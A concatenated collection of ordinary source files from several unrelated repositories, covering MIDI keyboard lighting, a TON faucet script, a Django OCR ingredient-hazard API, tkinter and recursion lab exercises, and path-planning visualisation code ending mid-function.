colors[3*key:3*key+3]=black #set the key back to black
device.write([0x82] + colors) #changes the color of pressed key
if __name__ == '__main__':
"""Main: connect to keyboard, open midi input port, listen to midi"""
print ("Connecting to Komplete Kontrol Keyboard")
connected = init()
if connected:
print ("Opening LoopBe input port")
ports = mido.get_input_names()
for port in ports:
if "LoopBe" in port:
portName = port
print ("Listening to Midi")
with mido.open_input(portName) as midiPort:
black = [0x00] * 3 #color, R + G + B (in this case black)
colors = black * numkeys #sets the color to all 88 keys (when it gets written to kontrol)
for message in accept_notes(midiPort):
print('Received {}'.format(message))
LightNote(message.note, message.type, message.channel, message.velocity)
``` |
{
"source": "a1xbu/DevergenceWallet",
"score": 2
} |
#### File: DevergenceWallet/faucet/setcode.py
```python
import sys
from Faucet import Faucet
from User import User
from tonclient.client import DEVNET_BASE_URLS, MAINNET_BASE_URLS
def main():
if len(sys.argv) <= 1:
print("Usage: \nkeyfile.json [endpoint1] [endpoint2] [...]")
return
endpoints = sys.argv[2:] if len(sys.argv) >= 2 else DEVNET_BASE_URLS
keyfile = sys.argv[1]
faucet = Faucet(keyfile, endpoints)
user = User(keyfile, endpoints)
user_code = user.get_code_from_tvc()
print(user_code)
result = faucet.setUserCode(user_code)
print(result)
print(faucet.get_address())
if __name__ == '__main__':
main()
``` |
{
"source": "a1xg/OpenTox",
"score": 2
} |
#### File: apps/backend/mixins.py
```python
from .services.hazard_assessor import HazardMeter
from .services.ocr import ImageOCR
from .serializers import IngredientsSerializer, ProductSerializer, DetailsIngredientSerializer
from .services.text_blocks_screening import IngredientsBlockFinder
from .services.db_tools import DBQueries
from .services.ocr_settings import *
class SearchMixin:
def __init__(self):
self.box_index = None # Target block with text
self.queryset = None
self.output_image = None
def _get_queryset(self, **kwargs):
if 'request_text' in kwargs:
finder = IngredientsBlockFinder(data=kwargs['request_text'])
self.queryset = finder.get_data()
if finder.box_index != None:
self.box_index = finder.box_index
elif 'pk' in kwargs:
self.queryset = DBQueries().search_in_db(pk=kwargs['pk'])
def get_context(self, **kwargs):
if 'image' in kwargs:
ocr = ImageOCR(img=kwargs['image'])
kwargs['request_text'] = ocr.get_text(
text_lang=DEFAULT_LANG,
crop=kwargs['crop'],
)
elif 'text' in kwargs:
kwargs['request_text'] = [{
'lang':DEFAULT_LANG,
'text':kwargs['text']
}]
self._get_queryset(**kwargs)
ingredients_data = IngredientsSerializer(self.queryset, many=True).data
output_data = HazardMeter(data=ingredients_data, display_format=kwargs['display_format']).get_data()
output_data['image_with_ingredients'] = None
if self.box_index != None:
output_data['image_with_ingredients'] = ocr.draw_boxes(
index=self.box_index,
max_resolution=700,
color= (0,255,0),
base64=True
)
if kwargs['display_format'] == 'list':
return ProductSerializer(output_data, many=False).data
elif kwargs['display_format'] == 'detail':
return {
'ingredient': DetailsIngredientSerializer(output_data, many=False).data
}
```
#### File: apps/backend/serializers.py
```python
from rest_framework import serializers
from .models import *
# REST API request serializers
class TextSearchSerializer (serializers.Serializer):
text = serializers.CharField()
def validate_text(self, attrs):
if len(attrs) <= 0:
raise serializers.ValidationError('Please enter components')
return attrs
class ImageSearchSerializer (serializers.Serializer):
image = serializers.ImageField()
crop = serializers.BooleanField()
def validate_image(self, attrs):
if len(attrs) <= 0:
raise serializers.ValidationError('Please select an image to download')
return attrs
class Hazard_GHSSerializer (serializers.ModelSerializer):
"""
Serializer combining data from Hazard_GHS and GHS tables
"""
id = serializers.IntegerField(source='ghs.id', read_only=True)
hazard_class = serializers.CharField(source='ghs.hazard_class', read_only=True)
abbreviation = serializers.CharField(source='ghs.abbreviation', read_only=True)
hazard_category = serializers.CharField(source='ghs.hazard_category', read_only=True)
ghs_code = serializers.CharField(source='ghs.code', read_only=True)
description = serializers.CharField(source='ghs.description', read_only=True)
hazard_scale_score = serializers.IntegerField(source='ghs.hazard_scale_score', read_only=True)
class Meta:
model = Hazard_GHS
fields = (
'id',
'hazard_class',
'abbreviation',
'hazard_category',
'ghs_code',
'description',
'confirmed_status',
'hazard_scale_score',
'number_of_notifiers',
)
# Model serializers for internal application logic
class HazardSerializer(serializers.ModelSerializer):
hazard_ghs_set = Hazard_GHSSerializer(many=True, read_only=True)
class Meta:
model = Hazard
fields = (
'total_notifications',
'sourse',
'hazard_ghs_set',
'cl_inventory_id'
)
class IngredientsSerializer(serializers.ModelSerializer):
hazard = HazardSerializer(many=False, read_only=True)
class Meta:
model = Ingredients
fields = (
'id',
'main_name',
'hazard',
'e_number',
'functions',
'pubchem_cid',
'cas_numbers',
'ec_numbers',
'colour_index',
'description',
'request_statistics',
'synonyms'
)
# Ingredient detail serializers
class GHSDetailsSerializer(serializers.Serializer):
"""
Ingredient hazard data serializer detail page
"""
# id = serializers.IntegerField()
hazard_class = serializers.CharField()
abbreviation = serializers.CharField()
hazard_category = serializers.CharField()
ghs_code = serializers.CharField()
description = serializers.CharField()
hazard_scale_score = serializers.IntegerField()
number_of_notifiers = serializers.IntegerField()
percent_notifications = serializers.IntegerField()
class DetailsIngredientHazardSerializer (serializers.Serializer):
"""
Ingredient hazard detail serializer
"""
hazard_ghs_set = GHSDetailsSerializer(many=True)
ingredient_hazard_avg = serializers.IntegerField()
total_notifications = serializers.IntegerField()
sourse = serializers.CharField()
cl_inventory_id = serializers.IntegerField()
class DetailsIngredientSerializer (serializers.Serializer):
"""
Serializer of data and ingredient identifiers
"""
id = serializers.IntegerField()
hazard = DetailsIngredientHazardSerializer(many=False)
main_name = serializers.CharField()
e_number = serializers.CharField()
functions = serializers.ListField()
pubchem_cid = serializers.IntegerField()
cas_numbers = serializers.ListField()
ec_numbers = serializers.ListField()
colour_index = serializers.ListField()
description = serializers.CharField()
request_statistics = serializers.IntegerField()
synonyms = serializers.DictField()
# Serializers for search results
class GHSListSerializer (serializers.Serializer):
"""
Hazard data serializer of an ingredient in an ingredient list
"""
id = serializers.IntegerField()
hazard_class = serializers.CharField()
# abbreviation = serializers.CharField()
# hazard_category = serializers.CharField()
ghs_code = serializers.CharField()
description = serializers.CharField()
# hazard_scale_score = serializers.IntegerField()
# number_of_notifiers = serializers.IntegerField()
# percent_notifications = serializers.IntegerField()
class ListIngredientHazardSerializer (serializers.Serializer):
"""
Ingredient hazard data serializer on search results page
"""
ingredient_hazard_avg = serializers.FloatField()
hazard_ghs_set = GHSListSerializer(many=True)
class ListIngredientSerializer (serializers.Serializer):
"""
Serializer of the list of ingredients in a product
"""
id = serializers.IntegerField()
hazard = ListIngredientHazardSerializer(many=False)
main_name = serializers.CharField()
# e_number = serializers.CharField()
# functions = serializers.ListField()
# pubchem_cid = serializers.IntegerField()
# cas_numbers = serializers.ListField()
# ec_numbers = serializers.ListField()
# colour_index = serializers.ListField()
# description = serializers.CharField()
# request_statistics = serializers.IntegerField()
class ProductHazardStatisticsSerializer (serializers.Serializer):
"""
Whole product hazard data serializer
"""
id = serializers.IntegerField()
hazard_class = serializers.CharField()
# abbreviation = serializers.CharField()
# hazard_category = serializers.CharField()
description = serializers.CharField()
hazard_scale_score = serializers.IntegerField()
num_of_ingredients = serializers.IntegerField()
class ProductSerializer (serializers.Serializer):
"""
Product data serializer
"""
product_ingredients = ListIngredientSerializer(many=True)
detail_hazard_product = ProductHazardStatisticsSerializer(many=True)
product_hazard_avg = serializers.IntegerField()
image_with_ingredients = serializers.DictField()
```
#### File: apps/backend/views.py
```python
from rest_framework import generics
from rest_framework import response
from .serializers import *
from .mixins import SearchMixin
# DRF API VIEWS
class TextSearchAPIView(SearchMixin, generics.ListAPIView):
serializer_class = TextSearchSerializer
def post(self, request):
serializer = TextSearchSerializer(data=request.data, many=False)
if serializer.is_valid(raise_exception=True):
context = self.get_context(text=serializer.validated_data['text'], display_format='list')
return response.Response(context, status=200)
return response.Response(serializer.errors, status=400)
class ImageSearchAPIView(SearchMixin, generics.ListAPIView):
serializer_class = ImageSearchSerializer
def post(self, request):
serializer = ImageSearchSerializer(data=request.data, many=False)
if serializer.is_valid(raise_exception=True):
context = self.get_context(
image=serializer.validated_data["image"].read(),
display_format='list',
crop=serializer.validated_data["crop"]
)
return response.Response(context, status=200)
return response.Response(serializer.errors, status=400)
class DetailAPIView(SearchMixin, generics.RetrieveAPIView):
def get(self, request, pk):
context = self.get_context(display_format='detail', pk=pk)
return response.Response(context, status=200)
``` |
{
"source": "a1xg/Tesseract-opencv-OCR-for-product-labels",
"score": 3
} |
#### File: a1xg/Tesseract-opencv-OCR-for-product-labels/ocr.py
```python
import re
import base64
import numpy as np
import cv2
import pytesseract
import pycountry
from langdetect import detect, DetectorFactory
from ocr_settings import *
# Absolute path to tesseract.exe file if environment variable is not working correctly
pytesseract.pytesseract.tesseract_cmd = TESSERACT_PATH
# The module is able to select a text scene in images containing foreign objects
# and cut out text paragraphs separately. Unfortunately, the image skew compensation
# has not yet been implemented.
#
# The module is able to automatically recognize the language, for which it makes a
# test recognition of text from the cut sample of the image (the crop factor can be adjusted),
# the language is recognized and re-recognition is done with an explicit indication of the language.
# If the image contains several text paragraphs in different languages and the
# language was not specified, the module will automatically recognize the language of each paragraph.
#
# This module implements the calculation of the average number of lines, the average font size
# and the ratio of the size of the image to the text block in the image. This is required to
# automatically adjust the filters applied to the image in order to improve the quality of
# recognition of images with different font sizes, with a different number of lines and
# different text segmentation.
# TODO
# Find ways to process multiple images simultaneously.
# Check the recognized language in the list of available Tesseract otherwise return False.
# Process langdetect exception in case of image without text.
# Transfer the ocr module to the client side and rewrite it to JavaScript accordingly.
class ImageOCR:
def __init__(self, img):
self.original = img
# if image dtype == numpy.ndarray
self.img = img
#if image dtype is binary
#self.img = self._decode_image(img)
self.result = [] # output list of dictionaries with recognized text in the format {'lang':'text'}
self._boxes = []
def _decode_image(self, input_img) -> np.ndarray:
'''Decode bytes image to numpy format'''
print(f'input img:{type(input_img)}')
decoded_img = cv2.imdecode(np.fromstring(input_img, np.uint8), cv2.IMREAD_UNCHANGED)
return decoded_img
def _encode_image(self, input_img:np.ndarray):
'''Encodes an np.ndarray into a base64 string'''
retval, buffer = cv2.imencode('output.jpg', input_img)
# Convert to base64 encoding and show start of data
base64_string = base64.b64encode(buffer)
output_image = {
'height':input_img.shape[0],
'width':input_img.shape[1],
'image':base64.b64encode(buffer),
}
return output_image
def _image_preprocessing(self) -> np.ndarray:
'''Flattening the image histogram'''
grayscale = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize= (8,8))
normalised_img = clahe.apply(grayscale)
self.img = normalised_img
def _resize_image(self, image:np.ndarray, max_resolution:int) -> np.ndarray:
""" The method resizes the image to the maximum allowed
maintaining the original proportions regardless of vertical or
horizontal orientation, for example: from image 2000x1600px or 1600x2000px, if the maximum dimension
set as 1000 pixels, then 1000x800 or 800x1000 can be obtained.
"""
max_dim = max(image.shape[0:2])
scale_coef = max_dim / max_resolution
new_dim = (int(image.shape[1] / scale_coef), int(image.shape[0] / scale_coef))
img_scaled = cv2.resize(image, new_dim, interpolation=cv2.INTER_CUBIC)
return img_scaled
def _measure_strings(self) -> tuple:
'''Method of counting text lines in an image and measuring the average font height
:param image:
:return:
'''
num_lines = []
font_size = []
height, width = self.img.shape[0:2]
for slice in MEASURE_STRINGS_SLICES:
newX = width*slice[0]
newW = width*slice[1] - width*slice[0]
crop = self.img[0:height, int(newX):int(newX+newW)]
crop = self._get_text_mask(crop, font_size=0, num_lines=0)
# Reduce the 2D array along the X axis to a 1D array
hist = cv2.reduce(crop, 1, cv2.REDUCE_AVG).reshape(-1)
H, W = crop.shape[:2]
lines = [y for y in range(H - 2) if hist[y] <= MEASURE_TH and hist[y + 1] > MEASURE_TH]
if len(lines) > 0:
font_size.extend([lines[i+1] - lines[i] for i in range(len(lines) - 1)])
num_lines.append(len(lines))
# Calculate the average line height in pixels
mean_font_size = int(np.array(font_size).mean()) if len(font_size) > 1 else 0
# Calculate the average number of text lines
mean_num_lines = int(np.array(num_lines).mean()) if len(num_lines) > 1 else 0
return (mean_font_size, mean_num_lines)
def _get_text_mask(self, image:np.ndarray, font_size:int, num_lines:int) -> np.ndarray:
"""
The method searches the image for a text block and creates
mask to use it to find outlines bounding the text and crop the excess part of the image.
"""
rect_kernel_size = (100, 5) # (W, H) default values 100, 5
sq_kernel_size = (100, 5) # (W, H) default values 100, 5
if bool(font_size) == True:
# calculate the coefficient of sparseness of the text in the image for optimal filter settings
h_text_coef = font_size*num_lines/image.shape[0]
rect_kernel_size = (int(font_size*0.6), int(font_size*0.4/h_text_coef))
sq_kernel_size = (int(font_size*0.5), int(font_size*0.4/h_text_coef))
elif bool(font_size) == False:
None
# Apply filters to the image
imgBlur = cv2.GaussianBlur(image, (3, 3), 0) # 3Х3
kernel1 = cv2.getStructuringElement(cv2.MORPH_RECT, rect_kernel_size)
kernel2 = cv2.getStructuringElement(cv2.MORPH_RECT, sq_kernel_size)
blackHat = cv2.morphologyEx(imgBlur, cv2.MORPH_BLACKHAT, kernel1)
gradX = cv2.Sobel(blackHat, ddepth=cv2.CV_32F, dx=1, dy=0, ksize=-1)
gradX = np.absolute(gradX)
(minVal, maxVal) = (np.min(gradX), np.max(gradX))
gradX = (255 * ((gradX - minVal) / (maxVal - minVal))).astype("uint8")
gradX = cv2.morphologyEx(gradX, cv2.MORPH_CLOSE, kernel1)
threshold1 = cv2.threshold(gradX, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
threshold2 = cv2.morphologyEx(threshold1, cv2.MORPH_CLOSE, kernel2)
text_mask = cv2.erode(threshold2, None, iterations=4)
# remove the edge of the image, so that in the future there
# would be no outlines recognition outside the image
border = int(image.shape[1] * 0.05)
text_mask[:, 0: border] = 0
text_mask[:, image.shape[1] - border:] = 0
return text_mask
def _get_binary_images(self, image:np.ndarray, font_size) -> list:
'''The method crops the text area of interest in the image, brings the
resolution of the cropped area to the new standard maximum resolution.
'''
binary_images = []
# If the list of bounding boxes is empty, then the entire image will be the bounding box
self._boxes = [[0, 0, image.shape[1], image.shape[0]]] if len(self._boxes) <= 0 else self._boxes
# Cut out blocks with text from the original image using bounding boxes
for index, box in enumerate(self._boxes):
(x, y, w, h) = box
cropped_img = image[y:y + h, x:x + w]
num_lines = int(cropped_img.shape[0]/font_size) # count the number of lines in the image
# If the number of lines is more than the threshold value, then we process the image, otherwise we skip
if num_lines > LINE_NUM_THRESHOLD:
# blur the image
blur_size = int(np.ceil(font_size*0.2))
blur_size = blur_size if blur_size % 2 != 0 else blur_size + 1
gaussian_blured = cv2.GaussianBlur(cropped_img, (blur_size, blur_size), 10)
# sharpen the image
test_sharpened = cv2.addWeighted(cropped_img, 1.5, gaussian_blured, -0.9, 0)
# blur the image in order to minimize noise in the image in the next step
median_size = int(np.ceil(font_size*0.02))
median_size = median_size if median_size % 2 != 0 else median_size + 1
medianblur = cv2.medianBlur(test_sharpened, median_size) # default 3
# image binarization
test_thresh = cv2.threshold(medianblur, 0, 255, cv2.THRESH_BINARY|cv2.THRESH_OTSU)[1]
# We calculate the percentage of black pixels relative to the total number of pixels
percent_zeros = int(cv2.countNonZero(test_thresh)*100/(test_thresh.shape[1]*test_thresh.shape[0]))
# If the background of the picture is more than n% black, and the text is white, then invert the colors
img_binary = cv2.bitwise_not(test_thresh) if percent_zeros < 40 else test_thresh
# We calculate the ratio of the height of the image to the font and the number of lines
scale_coef = font_size/TARGET_FONT_SIZE
max_dimension = max(img_binary.shape[0:2])
new_max_resolution = max_dimension/scale_coef
# Resize excessively large images based on the desired font size
scaled_binary_img = self._resize_image(img_binary, new_max_resolution)
binary_images.append((index,scaled_binary_img))
# return an array of binary images, if any.
return binary_images if len(binary_images) > 0 else False
def _find_boxes(self, mask_img:np.ndarray) -> None:
"""
The method accepts a binary image mask that selects text blocks.
The quantity parameter is intended to limit the number of boxes, remove duplicates and very small boxes.
The method will return the maximum {quantity} of boxes with the maximum area.
"""
contours, hierarchy = cv2.findContours(mask_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
img_area = mask_img.shape[0]*mask_img.shape[1]
boxes = []
for cont in contours:
# remove boxes whose area is less than the threshold value
(x, y, w, h) = cv2.boundingRect(cont)
if w*h < img_area/200:
continue
else:
# Expand the remaining boxes (%) using the coefficients by, bx so
# that the text is guaranteed to fit in them
by = int(h*TEXT_BOX_GAP_Y/100)
bx = int(w*TEXT_BOX_GAP_X/100)
x1, x2 = abs(x - bx), (x + w + bx)
y1, y2 = abs(y - by), (y + h + by)
# We check if the coordinates x2, y2 go beyond the image and if they do,
# then the coordinates are equal to the maximum dimension of the image
if x2 > mask_img.shape[1]:
x2 = mask_img.shape[1]
if y2 > mask_img.shape[0]:
y2 = mask_img.shape[0]
new_W, new_H = (x2 - x1), (y2 - y1)
boxes.append([x1, y1, new_W, new_H])
self._boxes = self._find_largest_boxes(boxes=boxes) if len(boxes) > NUM_OF_LARGEST_BOXES else boxes
def _find_largest_boxes(self, boxes:np.array) -> list:
'''The method takes a list of all found boxes and returns the given
number (not more than: NUM_OF_LARGEST_BOXES :) of boxes with the largest area'''
boxes_array = np.array(boxes)
areas = np.prod(boxes_array[:,2:4], axis=1)
max_areas_indises = np.argpartition(areas, -NUM_OF_LARGEST_BOXES)[-NUM_OF_LARGEST_BOXES:]
bigest_boxes = [boxes_array[i].tolist() for i in max_areas_indises]
return bigest_boxes
def _crop_image(self, image:np.ndarray) -> np.ndarray:
"""The method crops the image proportionally to the crop ratio (floating point numbers from 0 to 1)
relative to the center of the image."""
x, y, h, w = 0, 0, image.shape[0], image.shape[1]
# For correct language recognition, the width is additionally multiplied by 1.5 (you can experiment)
new_w, new_h = (w*CROP_FACTOR*1.5), (h*CROP_FACTOR)
new_x, new_y = (w - new_w), (h - new_h)
cropped_img = image[int(new_y):int(new_y+new_h), int(new_x):int(new_x+new_w)]
return cropped_img
def _recognize_text(self, conf:str, image:np.ndarray) -> str:
"""Text recognition method"""
return pytesseract.image_to_string(image, config=conf)
def _detect_lang(self, text:str) -> str:
# remove all non-alphanumeric characters
cleared_text = re.sub(r'[\W_0-9]+', ' ', text)
DetectorFactory.seed = 0
alpha_2_lang = detect(cleared_text.lower())
# Convert ISO 639-3 language code format from alpha_2 to alpha_3
langdict = pycountry.languages.get(alpha_2=alpha_2_lang)
alpha_3_lang_code = langdict.alpha_3
return alpha_3_lang_code
def get_text(self, text_lang:str, crop:bool) -> list:
"""text_lang The language must be specified in alpha-3 format,
if the language is unknown, then the text_lang parameter must be set to False.
If the language is not specified, then it will be recognized automatically,
but it will take more time, since text recognition needs to be done twice.
The crop parameter is set to True if the text needs to be cropped,
and False if the block of text has already been cut from the photo.
"""
self._image_preprocessing()
font_size, num_lines = self._measure_strings()
mask_img = self._get_text_mask(self.img, font_size, num_lines)
if crop == True:
self._find_boxes(mask_img=mask_img)
binary_images = self._get_binary_images(self.img, font_size)
else:
binary_images = self._get_binary_images(self.img, font_size)
if binary_images == False:
return False
# Loop through images prepared for OCR
for index, image in binary_images:
if text_lang == False:
# a cropped sample image is used to speed up language recognition.
sample_image = self._crop_image(image)
multilang_recog_text = self._recognize_text(TESSERACT_DEFAULT_CONFIG, sample_image)
# Detect language
recognized_lang = self._detect_lang(multilang_recog_text)
# After the exact definition of the language, we make repeated
# recognition with the exact indication of the language
custom_config = (f'-l {recognized_lang} --oem 1 --psm 6')
ocr_result = self._recognize_text(custom_config, image)
self.result.append({
'lang':recognized_lang,
'box_index':index,
'text': ocr_result
})
else:
# Recognition option if the language of the text is known
config = (f'-l {text_lang} --oem 1 --psm 6')
ocr_result = self._recognize_text(config, image)
self.result.append({
'lang': text_lang,
'box_index': index,
'text': ocr_result
})
return self.result
def draw_boxes(self, **kwargs) -> np.ndarray:
"""
Method for drawing bounding rectangles
It is intended for debugging of the module or delivery to the
user of the image with the selected text
:param index: (int) Index of the box text in the array self._boxes,
optional parameter to print one selected box.
:param max_resolution: (int) An optional parameter to scale the image
to a specified maximum measurement of height or width.
:param color: (tuple) color RGB for example (255,122,4)
:param thickness: (int) line thickness(pixels) of box
:param bytes: (bool) When specifying the parameter, truth will return
a byte-image, by default it will return an nd.array
"""
img = self.original
boxes = self._boxes # default value - all boxes
if 'index' in kwargs:
index = kwargs['index']
boxes = [self._boxes[index]]
line_color = (255, 0, 0) # default
if 'color' in kwargs:
line_color = kwargs['color']
line_thickness = 10 # default
if 'thickness' in kwargs:
line_thickness = kwargs['thickness']
for box in boxes:
(x,y,w,h) = box
cv2.rectangle(img, (x, y), ((x + w), (y + h)), line_color, line_thickness)
# If the maximum resolution is set, then the picture will be changed, otherwise return the original
if 'max_resolution' in kwargs:
img = self._resize_image(img, kwargs['max_resolution'])
if kwargs.get('base64') == True:
return self._encode_image(img)
return img
``` |
{
"source": "A1zak/Lab-11",
"score": 3
} |
#### File: A1zak/Lab-11/zadanie1.py
```python
import timeit
def factorial(n):
if n == 0:
return 1
elif n == 1:
return 1
else:
return n * factorial(n - 1)
def fib(n):
if n == 0 or n == 1:
return n
else:
return fib(n - 2) + fib(n - 1)
if __name__ == '__main__':
r_fib = fib(30)
r_factorial = factorial(30)
print(f'Результат работы рекурсивной функции чисел Фибоначчи(30) = {r_fib}.')
print(f'Время выполнения: {timeit.timeit("r_fib", setup="from __main__ import r_fib")} секунд.')
print(f'Результат работы рекурсивной функции факториала(30) = {r_factorial}. ')
print(f'Время выполнения: {timeit.timeit("r_factorial", setup="from __main__ import r_factorial")} секунд.')
``` |
{
"source": "A1zak/Lb20",
"score": 4
} |
#### File: A1zak/Lb20/Task_2.py
```python
from tkinter import *
# Решите задачу: напишите программу по следующему описанию.
# Нажатие Enter в однострочном текстовом поле приводит к перемещению текста из него в список (экземпляр
# Listbox ).
# При двойном клике ( <Double-Button-1> ) по элементу-строке списка, она должна копироваться в текстовое поле.
# Создаем функцию добавления в список
def add_item(event):
name = ent.get()
lbox.insert(0, name)
ent.delete(0, 'end')
# Создаем функцию удаления из списка и добавления в текстовое поле
def delete_item(event):
product = []
select = list(lbox.curselection())
select.reverse()
for i in select:
op = lbox.get(i)
product.append(op)
for val in product:
ent.insert(0, val)
for k in select:
lbox.delete(k)
if __name__ == '__main__':
# Создаем графический интерфейс
root = Tk()
root.title('Перемещение текста')
root.geometry('364x200')
# Создаем формы для ввода значений
ent = Entry(root, width=20, font=36)
# Создаем списки с помощью интерфейса
lbox = Listbox(width=30)
# Выводим
ent.grid(row=1, column=1)
lbox.grid(row=2, column=1, pady=5)
# Бинды
ent.bind('<Return>', add_item)
lbox.bind('<Double-Button-1>', delete_item)
# Запуск программы
root.mainloop()
``` |
{
"source": "A1zak/Lb21",
"score": 3
} |
#### File: A1zak/Lb21/Task3.py
```python
from tkinter import *
from tkinter import filedialog as fd
from tkinter import messagebox as mb
# в приведенной в лабораторной работе программе с функциями
# askopenfilename и asksaveasfilename генерируются исключения, если диалоговые окна
# были закрыты без выбора или указания имени файлов. Напишите код обработки данных
# исключений. При этом для пользователя должно появляться информационное диалоговое
# окно с сообщением о том, что файл не загружен или не сохранен. Добавьте кнопку
# Очистить", которая удаляет текст из поля. Перед удалением пользователь должен
# подтвердить свои намерения через соответствующее диалоговое окно.
def del_text():
answer = mb.askokcancel('Удаление текста',
'Реально удалить?')
if answer:
text.delete(1.0, END)
def insert_text():
file_name = fd.askopenfilename()
try:
f = open(file_name)
except (FileNotFoundError, TypeError):
mb.showinfo("Открытие файла",
"Файл не выбран!")
else:
s = f.read()
text.insert(1.0, s)
f.close()
def extract_text():
file_name = fd.asksaveasfilename()
try:
f = open(file_name, 'w')
except (FileNotFoundError, TypeError):
mb.showinfo("Сохранение файла",
"Файл не сохранен!")
else:
s = text.get(1.0, END)
f.write(s)
f.close()
root = Tk()
b3 = Button(text="Очистить", command=del_text)
b3.grid(column=1, sticky=E)
text = Text(width=50, height=25)
text.grid(row=1, columnspan=2)
b1 = Button(text="Открыть", command=insert_text)
b1.grid(row=2, sticky=E)
b2 = Button(text="Сохранить", command=extract_text)
b2.grid(row=2, column=1, sticky=W)
root.mainloop()
``` |
{
"source": "a20r/Dodger",
"score": 3
} |
#### File: Dodger/analysis/table.py
```python
import csv
import numpy as np
class Table(object):
def __init__(self, headers):
self.data = dict()
self.rows = list()
self.headers = map(lambda val: val.strip(), headers)
self.index_data = dict()
for header in self.headers:
self.data[header] = list()
self.index_data[header] = dict()
def get_headers(self):
return self.headers
def plot(self, h_x, h_y, plt, **kwargs):
plt.scatter(self(h_x), self(h_y), **kwargs)
plt.xlabel(h_x)
plt.ylabel(h_y)
def plot_func(self, h_x, h_y, func, plt, label=""):
xs = np.linspace(min(self(h_x)), max(self(h_x)), 1000)
ys = func(xs)
plt.plot(xs, ys, lw=3, label=label)
plt.xlabel(h_x)
plt.ylabel(h_y)
def splice(self, headers):
ret_dict = dict()
for header in headers:
ret_dict[header] = self.data[header]
return ret_dict
def to_matrix(self, *headers):
mat = [list() for _ in xrange(len(self.rows))]
for header in headers:
for j, datum in enumerate(self.data[header]):
mat[j].append(datum)
return mat
def try_conv(self, elem):
try:
return float(elem)
except ValueError:
if elem == "NA":
raise ValueError()
else:
return elem
def get_num_rows(self):
return len(self.rows)
def add_row(self, row):
try:
row = map(self.try_conv, row)
except ValueError:
return self
self.rows.append(row)
for i, elem in enumerate(row):
self.data[self.headers[i]].append(elem)
if not elem in self.index_data[self.headers[i]].keys():
self.index_data[self.headers[i]][elem] = dict()
for header in self.headers:
self.index_data[self.headers[i]][elem][header] = list()
for j, inner_elem in enumerate(row):
self.index_data[self.headers[i]][elem][self.headers[j]]\
.append(inner_elem)
return self
def get_row(self, i):
return self.rows[i]
def __getitem__(self, index):
ret_dict = dict()
for i, header in enumerate(self.headers):
ret_dict[header] = self.rows[index][i]
return ret_dict
def __call__(self, index, value=None, s_index=None):
if value:
if s_index:
return self.index_data[index][value][s_index]
else:
return self.index_data[index][value]
else:
return self.data[index]
def load_csv(csv_filename):
tab = None
with open(csv_filename) as f:
reader = csv.reader(f)
for i, row in enumerate(reader):
if i == 0:
tab = Table(row)
else:
tab.add_row(row)
return tab
```
#### File: Dodger/scripts/drawer.py
```python
__all__ = ["Axes3D"]
import matplotlib.pyplot as plt
import warnings
import path
from mpl_toolkits.mplot3d import Axes3D
class Drawer(object):
def __init__(self, fig, ax):
warnings.filterwarnings("ignore")
self.fig = fig
self.ax = ax
def clear(self):
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111, projection="3d")
return self
def get_xs_ys_ts(self, node_list):
xs = list()
ys = list()
ts = list()
for stp in node_list:
xs.append(stp.x)
ys.append(stp.y)
ts.append(stp.t)
return xs, ys, ts
def get_xs_ys(self, node_list):
xs = list()
ys = list()
for stp in node_list:
xs.append(stp.x)
ys.append(stp.y)
return xs, ys
def draw_temporal_nodes(self, rm):
xs, ys, ts = self.get_xs_ys_ts(rm.nodes())
self.ax.scatter(xs, ys, ts, alpha=0.5)
return self
def draw_nodes(self, rm):
xs, ys = self.get_xs_ys(rm.nodes())
self.ax.scatter(xs, ys, alpha=0.5)
return self
def draw_edges(self, rm):
for s_n, e_n in rm.edges():
self.ax.plot([s_n.x, e_n.x], [s_n.y, e_n.y])
return self
def draw_path(self, path):
xs, ys, ts = self.get_xs_ys_ts(path)
for i, s_n in enumerate(path[:-1]):
e_n = path[i + 1]
self.ax.plot([s_n.x, e_n.x], [s_n.y, e_n.y], [s_n.t, e_n.t],
"ro:", linewidth=2)
return self
def draw_agent(self, ag, t_m):
num_samples = int(t_m * 10)
t_step = t_m / num_samples
xs = list()
ys = list()
ts = list()
for i in xrange(num_samples):
t = i * t_step
if type(ag) == path.Path:
ag_pt = ag(t)
else:
ag_pt = ag.get_position(t)
xs.append(ag_pt.x)
ys.append(ag_pt.y)
ts.append(t)
self.ax.plot(xs, ys, ts, "y-", linewidth=2)
return self
def show(self):
self.ax.set_xlabel("X")
self.ax.set_ylabel("Y")
self.ax.set_zlabel("Time")
plt.show()
return self
def make(rm):
return Drawer(rm)
```
#### File: Dodger/scripts/map_generator.py
```python
import pygame
import sys
OBSTACLE_COLOR = (255, 0, 0)
BACKGROUND_COLOR = (200, 200, 200)
GOAL_COLOR = (255, 0, 255)
START_COLOR = (0, 0, 255)
ROBOT_COLOR = (0, 0, 255)
def draw_circle(screen, point, is_goal):
if is_goal:
pygame.draw.circle(screen, GOAL_COLOR, point, 30, 3)
else:
pygame.draw.circle(screen, START_COLOR, point, 30, 3)
def draw_polygon(screen, point_list, color, currently_working):
if len(point_list) == 1:
pygame.draw.circle(screen, color, point_list[0], 3)
elif len(point_list) == 2:
pygame.draw.line(screen, color, point_list[0], point_list[1], 3)
elif len(point_list) == 0:
return
else:
if currently_working:
pygame.draw.lines(screen, color, False, point_list, 3)
else:
pygame.draw.polygon(screen, color, point_list)
def start(width, height, filename):
pygame.display.init()
screen = pygame.display.set_mode((width, height))
screen.fill(BACKGROUND_COLOR)
done = False
obstacle_list = list()
current_obstacle = list()
robot = list()
start_point = [0, 0]
end_point = [width, height]
editing_obstacles = True
while not done:
screen.fill(BACKGROUND_COLOR)
for obstacle in obstacle_list:
draw_polygon(screen, obstacle, OBSTACLE_COLOR, False)
draw_circle(screen, start_point, False)
draw_circle(screen, end_point, True)
draw_polygon(screen, current_obstacle, OBSTACLE_COLOR,
editing_obstacles)
draw_polygon(screen, robot, ROBOT_COLOR, not editing_obstacles)
event_list = pygame.event.get()
for event in event_list:
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
if pygame.key.get_pressed()[pygame.K_s]:
start_point = pos
elif pygame.key.get_pressed()[pygame.K_g]:
end_point = pos
elif not editing_obstacles:
robot.append(pos)
elif editing_obstacles:
current_obstacle.append(pos)
elif event.type == pygame.KEYUP:
